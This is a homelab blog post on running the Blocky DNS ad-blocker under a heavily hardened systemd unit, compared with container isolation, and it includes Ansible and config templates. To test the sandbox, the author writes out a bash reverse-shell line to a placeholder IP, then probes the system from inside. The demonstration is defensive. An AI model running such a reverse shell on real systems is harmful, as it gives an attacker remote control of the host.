Loudwhisper

Blocky DNS, Systemd and nextDNS

It is a Friday evening (well, it was when I started writing...), I am alone home for a few hours, so I decided to put some relaxing tunes and write down some notes/guides/info about my latest project in my homelab.

Introduction

I want to just give an overall view of what I am going to discuss in this post, so that people who don't want to commit their time reading this yet, can decide whether it is interesting for them or not.

I want to talk mostly about two things:

For those who have already read this blog (maybe I should speak in singular, since it seems there is one RSS subscriber!), you might remember that not long ago I have written a post about container isolation, and I have specifically compared this to Systemd isolation. I have taken the chance, since I keep a server with really minimal dependencies, to do the deployment as hardened as I could, using Systemd; all of this to say, I am going to talk about Systemd unit hardening as well.

DNS Ad-Blocking

It's 2023, almost 2024 to be precise, and connecting to the internet via a web browser requires essentially to wear a digital condom. Every webpage is filled with Ads, most services we use, even if we pay for it sometimes, collect data and aim to monetize user behavior. My LG TV shows me Ads in the homepage about movies I should buy on Amazon even if I don't have Amazon apps installed, but everyone probably has their own favourite dystopian Ads anecdote.

In order to protect me and my family from tracking and advertising, there are a few things that I do:

The main difference between DNS Ad-blocking and "regular" Ad-blocking (e.g., UBlock Origin Plugin), is that the DNS one is simply more versatile. While the browser plugin works for that particular browser, DNS blocking works for every service within my local network (LAN).

How does DNS Ad-blocking work

DNS Ad-blocking unsurprisingly uses a custom DNS that employs blocklist to pretend that certain domains cannot be resolved. In general, DNS is a service that translates domain (mnemonic) names into internet addresses (IP). For example:

$ dig +short kagi.com
34.111.242.115

This command shows that if I enter kagi.com in my browser, this address is then translated to 34.111.242.115, which is what machines understand. The address is ultimately what's needed to talk to services on the internet, while the name is just our human way to remember things.

However, what happens if I try to translate a domain that does not exist? Well, nothing. The DNS server will simply respond with the fact that it does not have an answer to give us, and if we do that in a web browser we might get an error such as Hmm. We’re having trouble finding that site. (this is what Firefox uses, at least).

Now imagine that instead of using a public DNS, you can use a private DNS, which will essentially do the following:

This is exactly how DNS Ad-blocking works. There are many maintained lists of hosts/domains which track advertising/tracking, which we can add to our blocklist. When any device inside our network tries to reach out to any one of those, the connection will "break" at the very first step, because our devices won't know which address to use for those names.

Limitations of DNS Ad-blocking

As with every technical solution, DNS Ad-blocking has its limitations. In particular:

Final Remarks on Ad-blocking

Thankfully, Ad-blocking strategies are not in competition with each other, the more the merrier! You should run an Ad-blocker on every browser you use (PSA: Firefox for Android supports uBlock Origin), and if possible you should also use a DNS Ad-blocker, especially to protect those devices/services where you cannot install an Ad-blocker (e.g., certain mobile apps).

Running a DNS Ad-blocker

Having hopefully a clear idea of what DNS Ad-blocking is, let's see how we can run it.

Nowadays there are quite a few options to do this, some of which are effectively hands-off services, some are more DYI options. I am no expert, and this is not an exhaustive list, but the ones that immediately jump to my mind are:

I also discovered very recently a less-known tool which I decided to employ:

Probably PiHole is the most known (relatively, I can imagine this is still an extremely niche subject), but I don't like how by default it wants to "monopolize" a whole machine. I also don't need any web console and I want the maintenance for this to be low to non-existent, as when you mess with your DNS, the whole local network will explode very quickly and everyone home will start complaining :)

Before diving into the technical setup, a tl;dr: to run a DIY solution, you need some machine which is on 24/7 (a NAS, a raspberry PI, etc.); it can be very small, but it needs to run all the time. If you don't have one, you are better off using a service such as NextDNS.

Blocky Setup

One of the main selling points of Blocky for me is that it's written in Go. Go - but also Rust -, produces binaries which are static, which means the "installation" is essentially one file download. There is no need to fight with dependencies etc., which is something that I very much like as it supports my overall effort of reducing maintenance as much as possible.

In my case, I already had a machine which is running 24/7, where I was already running dnsmasq as DNS server for my internal network, but without Ad-blocking. My objectives for this project were the following:

Based on these requirements and on my previous rambling about container security, one would think that the no-brainer option would be to run a docker-compose file and be done in 20 minutes. However, I wanted to try first hand what it takes to achieve similar isolation using Systemd. This also accidentally allowed me to keep this machine more minimal, as I don't need (yet?) a container engine on it. Less software, less bugs, less CVEs, which is pretty nice for a machine that is also my VPN server to connect from outside home.

Automating Installation

To automate the installation and configuration I wrote an ansible playbook, which doesn't do anything crazy, and simply:

The ansible code is the Appendix A below, just in case you might want to take inspiration. Please remember to adjust to your needs, the code is written only for my own benefit, so it does not have all the parametrization you might need.

The playbook is idempotent (except the download which is done all the time), which means can be run multiple times without side-effects (use tags to limit the tasks to run).

I made some opinionated choices that you might not want or need:

If I will start paying for the NextDNS membership (which I am still considering), I won't need the hacky double DNS part anymore. But for the moment, this is what I have.

Security and Systemd

A large portion of the time spent on the setup was spent on securing the setup as much as possible. Specifically, since this tool is still a small third party project, I wanted to sandbox it as much as possible, so that if the tool itself would be compromised/backdoored, it would be able to do as little damage as possible.

⚠️ Note: Any software that is used to perform DNS is inherently in a privileged position to carry out certain attacks that potentially enable Man-in-the-middle attacks. Nowadays TLS and HSTS can protect us reasonably against many of these attacks, but a compromised DNS can still make damages, especially if you use HTTP in your local network!

The first step in securing the setup was to understand what this binary will realistically need:

These considerations mean that we should be able to allow very minimal privileges to the app, and then run it almost completely isolated.

We can start with a minimal Systemd unit, which has the basic covered:

[Unit]
Description=Blocky service
After=network-online.target

[Service]
User=blocky
ExecStart=/opt/blocky/blocky --config /opt/blocky/config.yaml
Restart=always

[Install]
WantedBy=network-online.target

This unit will not work unless we specifically set the NET_BIND_SERVICE capability to the binary.

However, as I mentioned in the previous post, Systemd has many security options, which means we can increase the isolation and lowering the blast radius of this binary being backdoored.

A very nice way to check the security posture of a Systemd unit is to run the following:

systemd-analyze security $SYSTEMD_UNIT

This will give us a "score" of the security for a unit and also hints to basically all security settings we can apply. Running it on our unit, will lead to a scary 9.2 UNSAFE at the moment!

The final list is the following, at least what I could come up with. I added a small comment to indicate what the option does, for more info there is the official documentation or some pages such as this one that talk about Systemd hardening specifically:

# Sets ambient capabilities to the NET_BIND_SERVICE
AmbientCapabilities=CAP_NET_BIND_SERVICE
# Sets the capabilities that a process can gain
CapabilityBoundingSet=CAP_NET_BIND_SERVICE
# Allows only AF_INET sockets, no IPv6/unix sockets
RestrictAddressFamilies=AF_INET
# Restrict the creation of additional namespaces
RestrictNamespaces=yes
# Prevent child processes from having more privileges that their parent
NoNewPrivileges=yes
# Isolate /dev
PrivateDevices=yes
# Run the process in an isolated mount namespace
PrivateMounts=yes
# Provide the process with a separate set of tmp directories
PrivateTmp=yes
# Deny access to the hardware or system clock
ProtectClock=yes
# Prevents access (modifications) to cgroups hierarchies
ProtectControlGroups=yes
# Restrict access to /home, /root and /run/user
ProtectHome=yes
# Restrict access to Kernel logs
ProtectKernelLogs=yes
# Restrict access to load/unload kernel modules
ProtectKernelModules=yes
# Restrict access to sysctl kernel settings
ProtectKernelTunables=yes
# Hide processes which are not owned by the blocky user from /proc
ProtectProc=invisible
# Use read-only mounts for system directory to avoid tampering
ProtectSystem=strict
# Deny the ability to use AF_PACKET sockets - used to sniff network
RestrictAddressFamilies=~AF_PACKET
# Restrict the ability to gain real-time priority over other processes
RestrictRealtime=yes
# Restrict the ability to set SUID/SGID on files
RestrictSUIDSGID=yes
# Deny a bunch of syscalls, similar to seccomp. The ~ means "not".
SystemCallFilter=~@clock
SystemCallFilter=~@debug
SystemCallFilter=~@module
SystemCallFilter=~@mount
SystemCallFilter=~@reboot
SystemCallFilter=~@privileged
SystemCallFilter=~@swap
SystemCallFilter=~@cpu-emulation
SystemCallFilter=~@obsolete
# Restrict the ability to use NETLINK sockets
RestrictAddressFamilies=~AF_NETLINK
# This would essentially chroot the process to a specific path
# It can be enabled, but since the blocklists are downloaded over HTTPs,
# We will need to provide inside /opt/blocky a copy of the system ca-certificates
# sudo cp -r /etc/ssl/certs/ /opt/blocky/etc/ssl/
#RootDirectory=/opt/blocky
# Does not allow the process to change its personality - aka execution domain (see man 2 personality)
LockPersonality=yes
# Make memory pages nonexecutable
MemoryDenyWriteExecute=yes
# Cleanup user's IPC resources after logout
RemoveIPC=yes
# Default umask for files created by this process
UMask=0077
# Restrict access to modify the hostname
ProtectHostname=yes
# Restrict access to syscalls for architectures which are not the system's default one
SystemCallArchitectures=native
# Hides all files not associated with process management from /proc
ProcSubset=pid

Obviously, many of these options are not useful, given our process runs with low privileges, but they are extremely helpful in case of and to prevent a privilege escalation vector.

The configuration above, using systemd-analyze leads to Overall exposure level for blocky.service: 1.5 OK πŸ™‚.

To have an idea of what a compromise of such a unit would look like, we can try creating an identical unit with a reverse shell, and see what we can do:

ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/IP/4444 0>&1'

Once we get the connection back, we can look around:

ls /proc
75954
82777
82778
82794
self
thread-self

The /proc directory is quite empty, which makes it hard to enumerate other processes and disclose ENV variables, for example.

ls /home
ls: cannot open directory '/home': Permission denied

No access to /home at all, no private SSH keys, history files, etc.

mount
/dev/mapper/dns--vg-root on / type ext4 (ro,relatime,errors=remount-ro)

The whole / is mounted as read-only, no changes to /etc and similar possible.

That said, we still have (read-only) access to the system binaries and we have a writeable /tmp.

cd /tmp && /usr/bin/wget loudwhisper.me

This is mostly because we did not use the RootDirectory option, that would definitely solve most of these problems. However, it comes with a bit of overhead. The process inside the unit won't have access to the system's CA certificates, and will not also have access to timezone files, for example. All of these need to be copied over (cannot be symlinked), which means when an update happens, the new data should be copied again.

The careful reader would have noticed that these are exactly the things we usually take care of when we build a distroless image: a low-privileged user, CA certificates and timezone/locals files.

Systemd vs containers

Despite the fact that I decided to go with Systemd for this particular use case, I can't but reiterate some points I already made in the previous post about container isolation. Specifically, the main point is about the ease with which isolation can be achieved. Systemd requires us to use some 40-50 different options. Possibly, if we want to really have the strongest isolation, it also requires us to manage the CA certificates and timezone files.

Let's look at what this same isolation would look like if we were to use a well built container image.

First of all, the default configuration using the "official" image already delivers most of the isolation we need. The image is built from scratch which means inside the image there is basically nothing (specifically, the blocky binary and the CA certificates).

The whole image is 22MB and using dive we can see that the final image contains literally two files:

Current Layer Contents
Permission     UID:GID       Size  Filetree
drwxr-xr-x     100:100      22 MB  β”œβ”€β”€ app
-rwxr-xr-x       100:0      22 MB  β”‚   └── blocky
drwxr-xr-x         0:0     214 kB  └── etc
drwxr-xr-x         0:0     214 kB      └── ssl
drwxr-xr-x         0:0     214 kB          └── certs
-rw-r--r--         0:0     214 kB              └── ca-certificates.crt

Running the image with the default command as per the documentation would already get us in a position similar to what Systemd gives us.

docker run  -v /tmp/blocky-test/config.yaml:/app/config.yml -p 4000:4000 -p 53:53/udp spx01/blocky

However, the process runs with potentially full capabilities, and we want to prevent that:

cat /proc/68587/status | grep -i cap
CapInh: 00000000a80425fb
CapPrm: 0000000000000400
CapEff: 0000000000000400
CapBnd: 00000000a80425fb
CapAmb: 0000000000000000

We can drop all capabilities except what we need:

docker run  --cap-drop=ALL --cap-add=NET_BIND_SERVICE --name blocky -v /tmp/blocky-test/config.yaml:/app/config.yml -p 9999:4000 -p 8053:53/udp spx01/blocky

Now the bounding set contains exclusively the NET_BIND_SERVICE, which is what we want.

cat /proc/67881/status | grep -i cap
CapInh: 0000000000000400
CapPrm: 0000000000000400
CapEff: 0000000000000400
CapBnd: 0000000000000400
CapAmb: 0000000000000000

Technically, we could even drop this dependency, since we have docker (or Kubernetes) which can do the port mapping for us, allowing the application to bind on a high port.

At this point, with one command, we have a full mount isolation, network isolation, process isolation (including /proc), chroot-like isolation with no host files available within the container, no capabilities, low-privileged user and a default seccomp profile already applied.

The only difference is that in Systemd we block few additional syscalls, probably (which we could also do very simply by taking the default Docker seccomp profile and removing what we want), and we also limit the types of sockets the process can use. On the other hand, the container runs in a completely separate network namespace and it is the Docker engine that does the port-mapping for us, while this cannot be done with Systemd, since we need access to the host network to provide DNS service to other hosts! Well, technically the latter could be done using systemd-nspawn, which also uses a container.

To be clear, my point is that the end result is quite similar. Both setups, once hardened, are fairly hard to exploit and provide a good reduction to the blast radius if compromised. However, achieving this via containers is just trivial, a couple of command line flags and we are good to go, while in Systemd we need 40+ different options and potentially some more maintenance overhead.

Appendix A: Ansible Code

The playbook:

- hosts: all
  become: true
  tasks:
  - name: Installation | Create blocky user
    ansible.builtin.user:
      name: "{{ blocky.user }}"
      shell: /bin/false
      create_home: false
      system: true
      state: present
    tags: install

  - name: Configure | Create Blocky config path
    ansible.builtin.file:
        path: "{{ blocky.config_path }}"
        state: directory
        owner: "{{ blocky.user }}"
        mode: '0766'
    tags: install

  - name: Installation | Unpack binary
    unarchive:
      src: "https://github.com/0xERR0R/blocky/releases/download/{{ blocky.release }}/blocky_{{ blocky.release }}_Linux_x86_64.tar.gz"
      remote_src: yes
      dest: "{{ blocky.config_path }}"
      owner: "{{ blocky.user }}"
    tags: install

  - name: Installation | Cleanup release files
    file:  
        path: "{{blocky.config_path}}/{{ item }}"
        state: absent
    with_items: 
      - "README.md"
      - "LICENSE"
    tags: install

  - name: Installation | Add capability to blocky binary
    community.general.capabilities:
        path: "{{ blocky.config_path}}/blocky"
        capability: cap_net_bind_service+ep
        state: present

  - name: Configure | Create Blocky config 
    template:
        src: ../templates/blocky/blocky-config.yaml.j2
        dest: "{{ blocky.config_path }}/config.yaml"
        owner: "{{ blocky.user }}"
        mode: '0600'
    tags: configure

  - name: Configure | Create systemd unit
    template:
        src: ../templates/blocky/blocky.service.j2
        dest: /etc/systemd/system/blocky.service
        owner: root
        mode: '0600'
    tags: configure

  - name: Restart blocky
    systemd:
      name: blocky
      state: restarted
      daemon_reload: true

the ../templates/blocky/blocky-config.yaml.js:

upstreams:
  groups:
    default:
# This allows me to configure different upstream DNSs for my internal
# network and the public IP of the router. My ISP-issued router makes
# 24 queries/minute for NTP servers, which wastes a lot of DNS request
# if you are using NextDNS free tier.
{% for dns in blocky.free_dns %}
      - {{ dns }}
{% endfor %}
    192.168.0.0/24:
{% for dns in blocky.upstream_dns %}
      - {{ dns }}
{% endfor %}
    172.16.0.0/16:
{% for dns in blocky.upstream_dns %}
      - {{ dns }}
{% endfor %}
    10.0.0.0/8:
{% for dns in blocky.upstream_dns %}
      - {{ dns }}
{% endfor %}
    127.0.0.0/8:
{% for dns in blocky.upstream_dns %}
      - {{ dns }}
{% endfor %}
  strategy: parallel_best
connectIPVersion: v4

customDNS:
  customTTL: 1h
  filterUnmappedTypes: true
  mapping:
{% for host, ip in blocky.local_hosts.items() %}
    {{ host }}: {{ ip }}
{% endfor %}

blocking:
  # definition of blacklist groups. Can be external link (http/https) or local file
  blackLists:
    blocked:
{% for blocklist in blocky.blocklists %}
      - {{ blocklist }}
{% endfor %}
  whiteLists:
    allowed:
      - |
{% for whitelist in blocky.whitelist_regexes %}
        {{ whitelist }}
{% endfor %}
  clientGroupsBlock:
    default:
      - blocked
  blockType: zeroIp
  blockTTL: 30m
prometheus:
  enable: true
  path: /metrics

ports:
  dns: 53
  http: {{ blocky.metrics_iface}}:{{ blocky.metrics_port }}

bootstrapDns:
{% for dns in blocky.upstream_dns %}
  - upstream: {{ dns }}
{% endfor %}

caching:
  minTime: 5m
  maxTime: 30m
  prefetching: true

log:
  level: warn
  format: text
  timestamp: true
  privacy: false

Obviously the above can be configured as you want.

The Systemd unit template ../templates/blocky/blocky.service.js:

[Unit]
Description=Blocky service
After=network-online.target

[Service]
User={{ blocky.user }}
ExecStart={{ blocky.config_path}}/blocky --config {{ blocky.config_path }}/config.yaml
Restart=always
AmbientCapabilities=CAP_NET_BIND_SERVICE
CapabilityBoundingSet=CAP_NET_BIND_SERVICE
RestrictAddressFamilies=AF_INET
RestrictNamespaces=yes
NoNewPrivileges=yes
PrivateDevices=yes
PrivateMounts=yes
PrivateTmp=yes
ProtectClock=yes
ProtectControlGroups=yes
ProtectHome=yes
ProtectKernelLogs=yes
ProtectKernelModules=yes
ProtectKernelTunables=yes
ProtectProc=invisible
ProtectSystem=strict
RestrictAddressFamilies=~AF_PACKET
RestrictRealtime=yes
RestrictSUIDSGID=yes
SystemCallFilter=~@clock
SystemCallFilter=~@debug
SystemCallFilter=~@module
SystemCallFilter=~@mount
SystemCallFilter=~@reboot
SystemCallFilter=~@privileged
SystemCallFilter=~@swap
SystemCallFilter=~@cpu-emulation
SystemCallFilter=~@obsolete
RestrictAddressFamilies=~AF_NETLINK
# This is commented because if using this, the local CA certificates
# need to be copied inside {{ blocky.config_path }} too.
#RootDirectory={{ blocky.config_path }}
LockPersonality=yes
MemoryDenyWriteExecute=yes
RemoveIPC=yes
UMask=0077
ProtectHostname=yes
SystemCallArchitectures=native
ProcSubset=pid

[Install]
WantedBy=network-online.target

As a reference, for the machine which hosts the DNS, I have the following inside host_vars/machine:

blocky:
  release: "v0.22"
  user: blocky
  config_path: /opt/blocky
  free_dns:
    # Quad9 IPs
    - 9.9.9.9
    - 149.112.112.112
  upstream_dns:
    - [NextDNS IP-redacted]
    - [NextDNS IP-redacted]
  blocklists:
    - https://raw.githubusercontent.com/StevenBlack/hosts/master/hosts
    - https://s3.amazonaws.com/lists.disconnect.me/simple_ad.txt
    - https://s3.amazonaws.com/lists.disconnect.me/simple_tracking.txt
    - https://v.firebog.net/hosts/AdguardDNS.txt
    - https://big.oisd.nl/domainswild2
  whitelist_regexes:
    - "/^an.exception.com/"
  metrics_port: 4000
  metrics_iface: [IP-redacted]
  local_hosts:
    one.my.domain: [IP-redacted]
    another.my.domain: [IP-redacted]
    my.domain: [IP-redacted]

If you find an error, want to propose a correction, or you simply have any kind of comment and observation, feel free to reach out via email or via Mastodon.

Categories: #tech #security Tags: #dns #ad-blocking #security